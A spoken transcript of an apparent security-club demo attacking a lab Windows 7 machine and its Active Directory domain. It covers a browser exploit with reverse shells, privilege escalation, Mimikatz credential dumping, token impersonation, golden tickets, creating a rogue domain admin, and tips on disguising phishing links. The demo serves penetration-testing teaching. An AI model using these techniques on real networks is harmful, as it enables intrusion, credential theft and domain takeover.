So today, we're going to be doing some Windows privilege escalation, which is pretty fun, but it's also very frustrating because things just never work. So this is my cheat sheet on the left. All these beautiful usernames and passwords that we're not going to be using, except the ones that we are, such as Cali. That's the only one we're going to be using. We also have our domain admin and a local user who is also a domain user on this Windows box. This is a Windows 7 Ultimate box running Service Pack 1, version 6.1. And we have our domain admin somewhere. Here. Password CU Cyber 0123. Running this Windows Server 2012 R2, version 6.3. It's pretty good. It's very easy to set up if you want to try this out yourself. It only took me like 20 minutes to set up the server, if that. Okay. Local or domain? Domain. Let me try and get this off to the side so I can actually see it. That'll do. Okay. So let's start off. If I can hide this, that would be great. We won't be using the server, or at least we won't for the most part. I think I'm going to use it towards the end to show you something. But besides that, it's all going to be on the Kali box. So to make sure these were networked, what I did was I just ran TCP dump to check for ICMP requests and then pinged the Kali box. And as you can see, we're getting the requests, or the pings rather. So we know they are connected and that our network is properly set up. I'll delete these. Those aren't too useful anyways. So we can quit that. So let us start off. So we have this example domain administrator account on the DC box. And we have this local user on this who is a user and not an admin on the box. He's also a domain account. As you can see, johndoe.example. The domain we're going to be attacking is example.com. And then we have our Kali box, which is just root and tor. And these are the IPs beside it. So in case you want to keep track, this is going to be 37. This is the box we're going to be using to attack. The domain user, this is .10. And also the local user .10. And then the DA, I believe, is .5. So I'll add that. Okay, so the first thing I did is I have a shared folder on my host called shared, and I'm putting all of my stuff that I need from the internet on here because my environment doesn't have any internet because I'm terrible at networking VMs. So that's how that's going to go. So what you need to do is you need to mount it, unless I already did. I did not. So I'm going to make a folder called shared, and one second. I can make sure I didn't do anything. Okay, yes. Make a folder called shared, and then we are going to mount t vbox sf and then shared. And then we need to do the path to the folder that we just created. And you can do that once you have your shared folder settings set up. So we need to go find that folder, which is that. Auto mount, make permanent, okay. And now it goes into the machine folder section. You can have it go into the transient folders if you don't set make permanent. It's not too much of a difference. So now it's mounted, and if we go and check it, we can see that everything that we have in here shows up. So if you want to download stuff from GitHub or anywhere else, you can just throw it on your host and git clone it, and then it'll automatically go to the guest. Okay, so now let's get into Metasploit framework and start hacking away at this Windows 7 box. So we're just going to launch up Metasploit. By the way, this is a fully upgraded Kali box. It's running 4.9.0, and it's the newest version. I think it's a rolling distro now. So that is what I'm using. Other than that, literally nothing's been changed. So all you have to do is just go here, click Metasploit framework, and now you've got your console ready to go. So we're going to start off by using an exploit for the browser on Windows. So exploit Windows browser, because this is my preferred way of doing things. And we're also going to be using MS1103, which is an Internet Explorer, as you can see, IE CSS import. It's an Internet Explorer vulnerability. Another one I saw online is the Java store image array. So if your Windows box has Java installed and running on Internet Explorer, go for that. That probably works just as well. But I've tested this a million times, and the CSS import one works perfectly every single time for me. So we can check what it's about by typing info. And as you can see, it's MS1103, Microsoft Internet Explorer, CSS recursive import, use after free. So that's the full name of the vulnerability that we're going to be using. The module, as you can see, is the path we just gave it, exploit Windows browser, so on. The platform we're attacking right now is Windows. You don't need to be privileged to use it, and it is ranked good. So that's great. So our available targets it just automatically goes. You can set a target by typing set target and then 0 through 4 in this case. But set target, I believe, is automatically set to 0. So it just automatically does it. If you know your specific target, you can do 1, 2, 3. So you can attack specific Internet Explorer version. In this case, we'll just leave it at automatic, which makes our life easier. And below that are the settings that we need to set. So the URI URI path is the thing that's after the URL. So the URL we're going to have at some point will be, I'll go over to the host. It'll be like this, HTTP 192.168.56.37, because that's our guest. And then the URI is just the thing that comes after it. So if we set our URI path to just the /, that's what it'll look like. In this case, we're going to have to specify a port. So let's say 8080. And then the URI path, which could be just a /, or you could do it something like, if you're trying to social engineer somebody and you're sending them a phishing email, maybe you obscure the link, maybe you don't, maybe you say, hey, look at this cool thing. It's I don't know, like celebrity nude.wmv or something. I don't know. Make something up, and hopefully your target will click on it. So that's what the URI path is. Your serve port is just the port that you want it to be running on, and then your serve host will be the host that you want them to connect back to. So let's get setting some things. So setting serve host to 192.168.56.37. In case that wasn't clear, I have config. This is our IP, our local IP. So we're going to set that, and then we're going to set the serve port to, I think we can keep that at 8080. I believe it's already set. Yes, it's set for us at 8080. We also need to set the L host, or actually I'll just show you what happens when you run it like that. Nothing good, usually, unless it just wants to be nice. Okay. Yeah, it says that we're listening to L host on 127, which won't work. At least it shouldn't. So let's just change that real quick. So we're going to set the L host to our IP 192.168 5637. And we're going to set the L port to 1337 because we're cool. Now we want to run exploit J again because we're running exploit as a job. We want a session back. Actually, let's change the URI path as I explained, because you don't want to have to type this in, which is what we're eventually going to do because I have nobody to click on my links. So set URI path to just do that. It'll keep things simple, and then we'll actually run our exploit this time. But we already ran it last time, so our port's now in use. So there we go. So now if you send an email to a victim and they click on it, this is what you need to hide your link as: HTTP 192.168. Get out of here, Windows Explorer 8. 192.168.56.37 on 8080. And as you can see, our session has been opened. Could not migrate to Explorer EXE, but then it ends up doing it because Metasploit's cool like that, and it actually spawns 2 sessions. Not entirely sure the point of that, but it does. And your victim will get to this error page. Not entirely sure what you can do. Maybe you can write something to have it redirect them. The Java vulnerability, as I mentioned earlier, Java store image array, it just loads like a Java frame, which then just displays a little Java logo and it's spinning. So that's an interesting one. So as we can see, we have our sessions. So if you just type sessions, you'll get a list of current active interpreter sessions or sessions in general. And we have 2 x86 Windows sessions on example John Doe. So we now have a domain user account that we could connect back to on port 1338 to their IP 192.168.56.10 on the port 49192 and 49195. So that's really great. Now, what do we go from here? How do we escalate? How do we get some more information? Well, let's do sessions I1. So this means you want to interact with session 1, which is this one. And so now you're in a interpreter session. So let's run sisinfo to get some info about what we're doing. So as you can see, the architecture is x64, but our interpreter is x86. So we're going to eventually have to migrate that process if we want things to work as expected. There's currently 2 logged on users, which I don't know what that's about, but that's pretty interesting. And our OS, it says Windows 7 build 7601 service pack 1, as we could have seen earlier. We can just close that. We can run winver. So the info matches up. We're in a good spot right now. We can close that for now. So what else do we really need to know? We kind of need to know who we are. And as it says, for example, John Doe, basically the same info you get here. So that means we do have a domain account, but we don't know if John Doe has any privileges. And judging by his name, he probably doesn't. So we could background this. That's how you get out of the interpreter session. It just puts that in the background so you can save it for later. As you can see, it's still there. We run sessions. So now we're going to use post Windows gather winpribs, and we are going to see what we need. All we need to give it is a session number. So we're going to give it that session 1. So set session 1. And then we're going to run exploit. And given enough luck, we should get some more information back. If not, we can move on to other things. Okay, post interrupted by console user. I didn't touch it. Give it one more shot. It might just be having some problems. In that case, we don't really need it, but it is a source of information if you do end up getting it working. All right, it just doesn't like me. Let's move on to another one. Let's try enum domain group users, which would give us a list of domain admins. So if we go to use post Windows gather enum domain group users, we can check what info we need. So info group session. We can also do show options, which will show you all the options that you need to set or not set. So we need to give it a session number. So set session 1. We also need to, also I just thought about it now, the reason this might not be working is because we didn't migrate the shell yet, but we can try it in a minute. So we'll get to that. So we also need to give it a group. The group we're going to give it is domain admins, because having a list of domain admins is really cool. Set group domain admins. Now let's give it a shot. We can try to exploit it. This is equivalent to popping a shell on it and then typing in net group domain admins / domain, which we can give it a shot in a second. Yeah, okay, so these keep telling me that it's being interrupted by the console user. I promise I'm not touching any buttons. So it might just need a, might just need to migrate the shell, and that would probably solve our problems. So if we go to sessions, we can go into our session 1 and run that same command. We can drop to a shell, just type shell, and you're now in a shell on the computer. Try and run net groups, domain admins, domain, and this may or may not give us a good response back. So the domain controller is currently processing a request. As you can see, the domain we now know is example.com. You can do it. Let's see what our domain controller is doing. Not doing too much. So we'll just be impatient. We'll just cancel this channel or terminate the channel. Channel L should give you a list of all the channels that are currently running, and you can specifically kill them given like channel C. So let's minimize this. Let's migrate our process, because I think that might be giving some trouble. So as you can see, we're currently in an x86 Explorer process. Example Joe syswow explorer.exe. So we need to migrate this to the x64 process, which is the process ID 1212. As you can see, the left-hand column is PID. So all we have to do is migrate, and then the process of the process the process ID of the process we want to migrate to. So 1212, and given enough, we could do it. However, we have more problems, which is always fun. So let's back out of this. Let's back around. And now we're going to put another Meterpreter session on here. And we can go back and do things that we couldn't do before. So use Windows local payload inject. So now we're going to use this thing to inject some payloads, given our other sessions. So set payload Windows, and this time we're going to specify it's an x64 Meterpreter session. Meterpreter, and then we're going to use reverse TCP, which helps bypass some firewalls. So we're going to set our payload, and then we need to check what other options we need to set. As you can see, we need to set the L host, the L port, and the session. We don't need to give it a PID because it says required no, so that's fine. So let's set our session to 1. Let's set our L host to 192.168.56.37 and set our L port to something random like 1, 2, 3, 4. Then we're going to run exploit J. It gets detected. Well, that's not good. Then you might want to use like veil evasion or something, hopefully. Oh, this is being rude to me now, considering it worked just like 3 minutes ago. Okay, well, it did migrate to a 64-bit process, as we can see our sessions I1. We are now supposedly in an x64 process. Still example John Doe, so that's okay. Let's give it a shot and try those things we were trying before. I'm going to just copy this over. See if anything works. Yeah, no, it still doesn't like me. All right, we're just going to go into the session and we're going to try something called get system. Get system. And in my experience, it hasn't worked. And I think that was the point Max wanted me to have it not work. So yay, I guess. What this does is it tries to get that system NT authority user under your control, which is really nice. It's a one-stop shop for getting escalated privileges. It seems to be hung. Okay. Well, it failed in my book, unless, yeah, it's already loaded. So we can cross that off the list. Background. Try and hop into our other session and see how it works. It seems Metasploit is like dying right now. Okay, well, that would explain a lot of our problems. So I think migrating and or hooking to that session was the process explorer.exe didn't quite pan out. So let's try and give it another shot of going back to it and getting that again. So we're going to load up that same exploit, set all our things. Go back on the Windows box. And let's give it some stuff. Alrighty. Went hard, and I got 2 more processes, which is what we wanted, or 2 more sessions, rather. So we just drop into that session again. We can see we are back to example John Doe. Hopefully everything is all good and okay. Let's back it up and try and drop that 64-bit again, 64-bit payload. HTTP, okay. Give it a shot. Set payload, Windows, local, oops, wrong one. Windows x64, reverse HTTP. Never actually used HTTP, so I'll give it a shot and see how this pans out. Show options, see what else we need to set. Looks good to me, hopefully. Session 1 did yes. Set session 3. Aha! We now have another interpreter session, and it is now an x64 process. So what we want to do with that is we're going to try those commands again and see if everything works out. If not, we can move on. But this is great for information gathering and learning more about the domain and the users on it. So let's get our hosts modules out, set the session 5, and exploit. Let's run it as a job and see what happens. Oop. I think we're getting that same warning. We can back off of that for now. Sessions, so we'll drop into that 5th one and try get system. And for some reason it fails, for one reason or another. I don't entirely know, but it does. So that really sucks. So another thing you can try, a lot of people just get stuck at get system, is you can try other exploits, specifically Kitropod, which I think is actually used by get system, but that's a recommendation, and then bypass UAC around those problems. So we'll give Kitropod a shot. It is exploit Windows local and then MS10 05 or Win5. So show options. We need to give it a session. That's pretty easy. Session 5. We also need to set our payload, and we're going to use that reverse HTTP because why not? And it failed because we didn't validate the L host. See what it's set to. Oh, can't do that. Try that. Nope, resource is already added. What are our options? Probably needs to be something other than that testing. Not vulnerable. Exploit not available on the system. Well, at least that rules that one out. Didn't expect that one to work, but might as well give it a shot. Another one you can try is bypass UAC, which I've seen work sometimes, but odds are this probably won't work. Only this was like Windows Vista or something. Things would be nice. All right. Yeah, Windows x86. I don't even think it works. I'm just going to take a stab and say it probably doesn't work for 64-bit systems, but we can give it a shot anyways, because why not? Set our session. And as for everything, Metasploit doesn't like unset addresses, so you just got to keep changing things up. So let's set our L host to what it needs to be, and I'll set our L port to something random again, 123445, and hopefully we can exploit. So UAC is set to default, and bypass UAC can bypass that, but something tells me it probably won't work, mainly because our only target was Windows x86, and so as you can see, it times out and no go. There's also bypass UAC VDS, which is another thing we can attempt. So let's load that one up, exploit Windows local bypass UAC VDS. Show our options. Start session to 5. And let's exploit. Let's set our L host again, 192.168.56.37, and set our L port to 11111. Now let's exploit. So it's telling us it may be vulnerable, but UAC is enabled. So unfortunately, we're not in the admins group, so we can't escalate using this. So we're just going to have to move on. What I recommend is when all else fails, I probably would have written some sort of module beforehand, or start up like an FTP server, or just use HTTP and drop sysret, which is a beautiful program. Sysret and its DLL minhook is what we're going to end up dropping. So we're going to move these to something we can access on our network. So we're just going to create a folder called dir browser, so that we can, on our Windows machine, actively pull those. So if you wrote something to where the victim would have code run on their box to download files, you can easily set this up to pull those. So as we go to my IP, we can just save that and download these to a hidden folder or something. So that wouldn't be too terribly difficult. So the user somehow gets these on their machine, however you intend. So as you can see, we now have sysret and the DLL, and I would put them in a hidden folder or something of that sort, and to make sure the user can't find them, maybe put them not in the user folder, but somewhere the user still has permission to access. And from there, we can drop into our shell. So we're going to drop back into session 5, sessions I5, and drop into a shell by typing shell. So as you can see, we're now in shell on the box. And all we have to do is we run sysret, but sysret requires a process ID to give it. So sysret's actually above here. So as you can see, we can run all the Windows commands we need, and we have sysret and the DLL perfectly fine. If we run sysret.exe, you'll see that sysret requires a process ID or an executable. To get a process ID, we're going to run the command task list. From here, we're going to find the explorer.exe, which is down here, but I'm just checking other processes. So once you find explorer.exe, you can grab the process ID right next to it, sysret.exe dash kid, and then give it the process ID of the one we want to hook into. And voila, we now have what we want. So just to get out of there, because sysret doesn't die itself, you just Control C. And if we back up out of here, we can now see that nothing changed. But if we go back in, UID, we should be something else other than John. Interesting. This is killing me right now. Live demos. Well, let's see. Explorer.exe, Notepad. Says I'm here, or at least something's here. Did this crash yet? No. We could give it another shot. It may not have completed fully. Not entirely sure. Shell. What sysret does is it's a vulnerability in Intel. So Intel devices are vulnerable to it. And that is right, PID 2936. And it gives us what we want, our NT authority. Up another Metasploit console, just in case. Never mind, active sessions aren't carrying over. Exit, no, you just have to cancel it. This is no bueno. Let's give it a shot. We can try another vulnerability. Let's drop into a shell and check. That's pretty good. Exit. Background. Give it a shot and use this exploit. Show options. Oh no, Windows x86. We can try it, but odds are it probably won't work. All right, let's give it another run now that our stuff is set. Yeah, session host is x64, target is specified as x86. RIP. That's not good. That's not good at all. Never had a sysret actually fail on me. So I'm now intrigued as to why that is failing. I'm going to go ahead and blame that HTTP thing. Sessions. Let's spawn another one. Might as well. Can't spawn too many. So let's go up. Some of that. Set session 4 because we haven't touched that one yet. Yay, we have another interpreter session. So let's give that a shot. And as you can see, we made it. It did actually work. Beats me as to why it didn't look like it worked, but we now have an MT Authority system account that we have control of. So that's pretty nifty. I'm just pretty happy that worked, actually. What we can run from here is some more things that we can take control of, because why not? Let's get some credentials going. So we're going to use the Metasploit credential collector. So we're going to set our session 6. And now we're going to exploit, and hopefully it gives us some stuff. Aha, look at that. Now at any point we can just type creds and it'll dump the database. Metasploit stores all this in its database. So if we widen that up a little bit, you can see these are NTLM hashes for administrator, guest, and John Doe. This is the part you want, this ending string. As you can see, these are identical between administrator and guest. So either they are the same password or they're not set, or something is up with that, because that's not usually what's going to happen. So we can also tell that this is what we want to crack. So if you were to take the NTLM hash and want to crack it, you can use John the Ripper. So if we open up another terminal, when I did John, format, NT, and then I had like a word list, I'm pretty sure you can specify just a single hash. But like word list, dictionaries, is it RockU dictionary, RockU.txt or something. So if you had your, I think it's Kali has like a specific word list path that you could specify for RockU, but you just give it the word list path and then specify the hash that you want to give it. It'll start cracking for you. Hopefully you can get that NTLM hash cracked, and you would have a ready to go password for John Doe. If you really don't want to take all that time, there's a much easier way where we can skip on down to Mimikatz, and I'll show you incognito in a bit. Mimikatz is really cool because it does a lot of things on Windows domains, and it also is really good at dumping memory or passwords stored in memory. So if we just go into, if we list our sessions and we drop into session 6, we can load Mimikatz because it has an extension in Metasploit. And we can also, you can run, if we just type help, we can see all the commands we can run. If you want to run custom Mimikatz commands, you're familiar with the command line, how it normally is, then you can run Mimikatz command -f and then whatever you normally do. So that's another option. You can also just use MSV, which dumps hashes. So Kerberos, example, John Doe, LM hash, and an NTLM hash. There you go with that. You also have a couple other options. Kerberos dumps Kerberos passwords. As you can see, this is our original password. The password for this domain account is cucyber123, and it just dumped that right out. So we now have a domain account, user and password. Aside from that, I'll show you a couple more that are really cool. You have SCK URL SA or something like that, which lists all of the passwords that it finds, and it lists them in a strange order, but it does a really great job. So we can see John Doe at example.com, password CUCyber. And you also have this SAM dump SAM hashes. So if we were to copy this, we can see that it also dumps more hashes. To list all available modules for Mimikatz, you just give it an awful command that doesn't work, and it'll say module intruvable, which means not found in French, because the guy who made it is French. And it tells you you can use all of these, and they're all pretty good except Minesweeper. I don't know if you want to use Minesweeper. You can also use WinMine to always win at Minesweeper, if that's up your alley. You're hacking computers to play Minesweeper and cheat. Beats me. At this point, you can just run this, and if a domain administrator has ever logged onto this computer, then that would be present. So I'll show you an example right now, but I won't use this password because it's cheating. So say you run this and nothing's here, and for some reason an administrator is now here, administrator on domainexample.com, conveniently the same password, CUCyber. If we now dump that again, we can see administrator CUCyber 1, 2, 3. So that pretty much takes care of that. That's pretty wild. If we go back, we dump Kerberos, which I think I just passed. Kerberos, you can also see that it dumps that. So I'd say I'd recommend Kerberos and that sec URL SA thing for dumping passwords. So at this point, if you have these this set of usernames and passwords from the administrator, you have a domain admin account that you can use, and you can just create more. So you can Samba in with Metasploit, and then just run some Windows commands to create more domain admins. If that's not the case, you can try something else, which is called incognito. So we're going to use incognito. And loaded. From here, we are going to list the tokens, or actually I'll show you the help menu first. We can do only a few things, but it's pretty powerful in what it can do. So first we want to list the tokens, list tokens. What else do we need to give it? We need to give it a group or a username. I'm just going to list it by username because that makes life easy. So as you can see, delegation tokens available. I just logged in with administrator on that computer. Normally you wouldn't see that, but this is the case at this point. So I'm currently in authority system, but say the administrator was on the computer, then I could easily just do impersonate token, and then you give it a domain name and the domain and name. So if we list our tokens and then we do impersonate token, we give it example and then 2 backslashes, because that's how an interpreter works. You have to give it 2 when you need one. And then you give it administrator. It may or may not work. It does. I think it worked about like 50% of the time for me. Sometimes it times out. Sometimes it grabs it. So you can give it a shot. It's a great, quick and dirty way to get, timed out. It's a great way to get the administrator token, and you instantly have domain admin, assuming the password wasn't found in memory. I could run it on example John Doe, but then that would completely screw up my interpreter session. I wouldn't have really any rights after that. So that's not the path I'm really looking to take. But if that is an option, I would at least try it, because that's a great way to get domain admin fast. if you were to, you can see in this cheat sheet, if you were to get it, it would say something along the lines of like domain admin taken or something. Example administrator got it. And at that point, you can use net user to create a domain account, and then you can give it the group domain admins. And now you have a domain admin account with free reign to do whatever you want. So with that, if you don't end up with anything, you can try an exploit called MS14068, which is a Kerberos exploit. The Python script for PyKek doesn't work for me like now. I think it used to work a while back. So if we just go into PyKek and I run MS14068, you can see some of the arguments that it requires, which we'll go through and I'll show you how to find them, because this is a great way to get it's a great way to get a token, if that's the correct terminology. You can get a golden ticket, and that is used to access things across the domain as if you were the administrator. So it requires a username and a domain name, which we have. We know we want to be administrator at example.com. We have a user SID in a minute, and we have a domain controller address, which we can easily get. So things to get that is we can drop into a shell. We can just say, who am I? And that'll tell us we're example administrator, which actually means I think that impersonate token did work. So the beauty of Metasploit is that it'll tell you it failed, and it didn't. Let's check that, because I'm not 100% certain it worked. So if we can check that by saying 192.168.56.5, that's the IP of our domain controller, and we can try and look at well, it worked. We can try and look at this volume that we wouldn't normally have access to. So we currently do have domain admin, yay. If we go up to our other sessions, I'll show you what that looks like when you don't have domain admin. So sessions, and we can drop into session 3 or something, session 5. Get UID, maybe. Okay, yeah, okay. So we are example John Doe, and if we drop into a shell and we run that same command, as you can see earlier, it's a directory of blah, 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 which means it did succeed. But if we don't have permission, it should say access is denied, which means we don't have the proper authentication in place to access it. So we need to be some sort of domain admin, or we need to spoof the ticket. So let's move on from that. I think I kind of want to go into session, what was I just in, session 5? I am in session 5. I kind of want to escalate, or at least impersonate back to my NT authority. So at this point, we have owned the whole domain. So if I just background this and sessions I6, I can say get UID, and we're example administrator now, like it's official. So I wonder if it actually shows that in the sessions. I'm gonna background it again. Sometimes, yeah, it's fickle. Session information just, doesn't want to be it. So we are example administrator, and we can drop into a shell, and it knows we're example administrator. So that's pretty fun. We can discuss PyKek in a little bit. So from here, as I was saying, you can just run those commands to create another domain admin account, which we will do if I can find it. So we're going to create a net user with the name Nick, and the password's going to be ha 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 ha. Oh wait, no, I probably need to conform to the standards of the domain. So we'll just do ha ha hacked you 123. But I also need to tell it to add it to the domain. So add domain. Windows password is longer than 14 characters. Do you want to continue? Apparently, I can't give that an option. So let's not have hacked you or haha hacked you 123. We'll just do ha hacked 123, which is also interesting because I think they're trying to discourage passwords longer than 14 characters, which is a little awkward. Computers with Windows prior to Windows 2000 will not be able to use this account. So that's pretty fun. It seems the domain controller is having a bad time processing requests. But assuming you set things up properly, or you're doing this on an actual network, things might be going much smoother. And I was on the wrong one. It would actually process your request to make an account. I don't know what it's doing. Things look fine. Those warnings are always there. Yeah. Let's see if it worked, maybe. Administrator guest John Doe. Not quite. But we still have domain admin, and that's pretty fun. So that's domain admin in that shell. That's because I gave it domain admin. At this point, this computer does not know about it. So there's that. But assuming you didn't get lucky and spoof that, what would you do? So I was going to discuss before, you can, actually let's drop out of domain admin and not be cool. So we're just going to exit this, and we're going to go back to incognito. I'm going to see what we can do with that. So if we list the tokens again, never mind. I'm not currently running as system, but I'm running as domain admin, so they hate me. Call rev2self. We can probably just run get system, and that'll you know, solve all our issues. We're now a system again. But at any point, we can go back to example administrator, the domain admin. So what we need some info. So who am I? Who am I all, or who am I UPN? So yeah, I'm not a domain user on this. Let me get out of this shell, background that, and go back to the normal ones. So I am a domain user on 3.4, but not 3.4.5, but not 6. Going to 3, shell, who am I, UPN. So you take note, I am johndoe@example.com, and you write that down somewhere in a notepad or something. And then you can also do exit from there, background that, and let's go back to our privileged session. So in here, we're system. You can run mimikatz command f sec url sa. I'm probably saying that wrong. Search passwords. And from here, that tells us the password that we needed, because we have to specify a domain user and password. So assuming we're just completely blind, we don't see administrator, or the administrator isn't there, and the administrator doesn't have a password the same as the user, That is the password that we want. See cyber, take note of that. Now we need to drop into a shell and run PowerShell.exe. And then we can run this disgustingly awkward command, security principal Windows identity get current, which tells us a few things. One, that we're system, and that's not entirely what we want. So let's back out of here. Let's go back to our, don't exit that. Background it. If you exit a Meterpreter session, it kills the session. So if you have an elevated Meterpreter session and you exit instead of backgrounding it, then you'll lose that, and that's really unfortunate. So let's go into session 3 again. Over to a shell, PowerShell.exe. From here, we get our SID. And this is what a SID looks like. The first part, and by first part, I mean almost all of it, is the domain SID. And then the last 4 is the part that makes it the user SID. So take note of that. And then the last thing we need is an nltest DC list example, which doesn't work for some reason. Let's get out of here. Let's try the other shell. I'm going back and forth. It works if you're a privileged user. So you need system or some other local admin to be able to run nltest. So here it's going to tell us that the domain controller is labdc01 and our domain is example. This is going to tell us and list all of the domain controllers. If DC list wasn't obvious, domain controller list in the domain example. So now it's going to tell us labdc01.example.com, primary domain controller. I'm assuming that's what that stands for, and the site default first site name. So if we take note of this part, labdc01example.com, we now have all the things that we need to exploit this Kerberos checksum thing. So if we were using ms1468.py, then all we would have to do is go here, plug in our info, so python ms.py, and we need to give it a username. And we know it's username at domainname.com. So we have John Doe at example.com. We know that, that's easy. And we need the user SID, which we had above, 1106 with the rest. We need the domain controller address, which we just got. And it'll ask you for a password, or you can do -p and specify it on the command line. I'm just going to receive cyber123. And this is what happens for me recently whenever I run this. I didn't submit an issue because I don't think anyone submits issues on this anymore. There's like 2 closed and 2 open, and they're from like 2014. So didn't even bother with that. It's implemented elsewhere. But if you can get that to work, more power to you. It usually works pretty well. So aside from that working, that's all our information we need to do a couple things. So assuming that did work, beforehand you would want to install Kerberos on here, and you want to install rdate. I think that might actually be my issue, is that I'm not synced with the server, but maybe, maybe not. Discord's going off. So maybe that's the case, maybe that isn't the case, but I'd do rdate and then the IP of the domain controller. So assuming I did have rdate, and I was trying to use PyKek to accomplish this, I'd do rdate and then the domain controller. I don't have rdate, so it is what it is. And then you do RPC client U. And then you'd have your cred user, which is John Doe, and the IP of the domain controller, 192.168.56.55. And then you just give it the password that you have. And now you're on the domain controller. You can do things from this, but I don't have any experience using RPC client, so I have no idea what to do. I think I've used it for one thing. Names, and then Rondo, and this will give you that SID that you needed for GGT. There you go. You get the SID for the Kerberos. Not entirely sure how you would escalate from this into like an actual shell or what this all gives you. But if you can somehow get domain admin and get onto the domain controller, which I will show you in a bit by cheating, then you can dump the Kerberos TGT hash and use that as a golden ticket. So let's assume that we didn't cheat, or we did not cheat, and for somehow or some reason we are now on the domain controller. I will cheat, and I will use I believe, yeah, psexec samba, and just sign into the domain controller, because yes. So I'm going to use this, and I'm going to, I need to set samba user to administrator, set samba pass to cyber123, and set the samba domain to example, although it doesn't need to be set. Hopefully from here we can exploit it and set the rhost. I lied. Set rhost to the host of the domain controller, 56.5. Given enough luck, and the fact that we already knew the password, we now have a 7th session open. So we are NT authority / system on lab DC01. So we are now on the domain controller. We drop into session 7, and we load up Mimikatz because it's per session. It'll tell us x86 Mimikatz on an x86 architecture, so we should probably end up migrating. So PS migrate 1912. Please work. Maybe, maybe not. Migration completed successfully. That's what happens when you actually do it, and it actually works. So now if we do sisinfo, we can see that we're running an x64 interpreter and an x64 architecture. So that's beautiful. So what do we need to do again? We need to dump the hashes. So hash dump. And here you can see that we have KRB, TGT, and all the other hashes that we had. So if we just copy this, we can use that later in our golden tickets. So what we are going to do is we're going to create these. And my favorite way so far of creating them is with using Kiwi. So if we drop into another one, oh, I closed that session accidentally, but we probably don't need it anymore. So let's drop into session 6. Who are we in session 6? We're NT authority, we should be. I'm gonna load Kiwi. And it's successfully loaded. Now we're going to use golden ticket create. And we're going to do administrator. That's the user. Because we want to specify any domain admin as our user. because that's who we're going to be spoofing in a sense. And then our K is going to be the hash. And then we need to give it the SID of our user. It's either user or domain. I'm not 100% set on that, but I'm giving it to user. And then we need to specify a file path. So root desktop find.ticket. Let's see, root desktop golden ticket create D example, error running command golden ticket create, no such file directory, root desktop. You're supposed to create desktop. That would explain a lot of things. Desktop. Hey, there we go. Now we have a ticket of some sort. Looks like this. From here, Kerberos ticket use, and then specified path. And it says we applied it successfully. We can do Kerberos ticket lists and see that we should be administrator at example.com. However, this has not worked for me ever. And I think it's because the server isn't vulnerable, or I just did something wrong. Either way, I really don't know. So if we try and do that dir thing again, and we list the path to it, we get access denied. Normally, if it worked properly and you did have the right ticket, that wouldn't be denied. You'd still be NT authority system. But whenever you're getting requested for domain access, it would use the Kerberos ticket that you have cached. So assuming all went well, you would be able to trot around the domain, and to escalate from here by just having a cached ticket, you would want to access that same console that is on the domain controller. I'll show it real quick. I don't know the command to get here. There's a specific command. But if you just go on here, and then you can go to users, and you can edit it. So you would spawn this, you'd say properties or whatever, and then you would edit their group. Maybe you could do it all on the command line. But you spawn that, and then make a domain admin through that. And from there, you would take control of the whole domain. And you could always go back, say, months later, assuming it wasn't patched, and re-authenticate with the same cached ticket. You can tell why it would be a couple months later, because the start time and end time are almost 10 years apart. So you could have theoretically done this for a long time had this never been exposed or properly displayed. So you see it's 6/23/2027 and not like some other absurd number. You can just keep going back with that. And that's pretty much all I have. Hopefully that helped some people. I don't think I have anything else on the list. Pretty much covers incognito, Mimikatz, Pykek. Actually, let's go back and try and see if we can get those info stuff done. Because I don't think that I don't even know if that'll work right now, but I'll give it a shot. That's pretty much it. If you have any questions, feel free to start typing them now. Or if whoever's in the Hangouts, you want to speak up, that would be perfectly fine. So set session 6. Late. There we go. It worked. So these are our Windows privileges. We are admin, we are system, we are in the local admin group. UAC is disabled. So we pretty much own this box right now. We can also use enum domain. crown domain, example.com. So that would be it for that. You can use this, set session 6 group domain admins, exploit. Nope, didn't work. Some things work, some things don't. But in that case, we could have dropped into the shell, and I'm pretty sure. Actually, I don't think our domain controller is properly configured to respond with those requests, and that's why it wasn't working. We can try and drop in though. Yeah, I remember it hanging here the last time, so I'll take it that probably doesn't work. The Discord's going off. Yikes. Stop sharing. So I hope everyone enjoyed. That was a lengthy presentation. If you have any questions, feel free to drop them in the Discord, drop them in YouTube, drop them wherever, and have a good day.